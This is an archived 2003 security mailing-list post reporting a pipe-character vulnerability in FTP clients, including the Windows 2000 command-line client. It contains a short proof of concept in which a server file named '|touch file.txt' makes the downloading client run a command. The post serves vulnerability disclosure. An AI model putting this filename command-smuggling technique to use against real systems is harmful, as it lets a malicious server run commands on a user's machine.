[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <Pine.GSO.4.53.0302251219580.7656@europa.oicinc.com>
From: schoe at oicinc.com (SChoe)
Subject: RE: Multiple Vendor FTP pipe Vulnerability
Oops. The "touch" syntax is wrong due to my lack of cut-n-paste skills.
touch \|touch\ file <--------Wrong
touch \|touch\ file.txt <--------Right
My bad...
On Tue, 25 Feb 2003, SChoe wrote:
> Date: Tue, 25 Feb 2003 12:17:50 -1000 (HST)
> From: SChoe <schoe@...inc.com>
> To: bugtraq@...urityfocus.com
> Cc: full-disclosure@...ts.netsys.com
> Subject: RE: Multiple Vendor FTP pipe Vulnerability
>
> Securityfocus has a post on its website regarding this vulnerability in
> many ftp clients. I've tested and subsequently validated this issue on
> many of the platforms mentioned in their advisory. They mention
> that the Netscape client on Windows 2000 Professional, but fails to
> mention that the commandline ftp client included with win2k (server and
> pro) are also vulnerable.
>
> <-----------------------snip----------------------->
> # Create file on ftp server for download by client.
> schoe@ftp:/home/ftp$ touch \|touch\ file
>
> # Start commandline ftp client on win2k.
> Microsoft Windows 2000 [Version 5.00.2195]
> <C> Copyright 1985-2000 Microsoft Corp.
>
> C:\ ftp ftp.xxxx.com
> ....
> ftp> get "|touch file.txt"
> ...
> ftp> quit
> 221 Goodbye.
>
> # "C:\file.txt" should now exist.
> <-----------------------snap----------------------->
>
> Multiple Vendor VTP pipe Vulnerability
> ======================================
> www.securityfocus.com/bid/396/info
.-------------------------------------------.
| Sung J. Choe <schoe[at]oicinc.com>, TICSA |
| Systems Admin, Facility Security Officer |
.-------------------------------------------.---.
| Oceanic Imaging Consultants, Inc. |
| Phone #: (808) 539.3634 |
.-----------------------------------.
Powered by blists - more mailing lists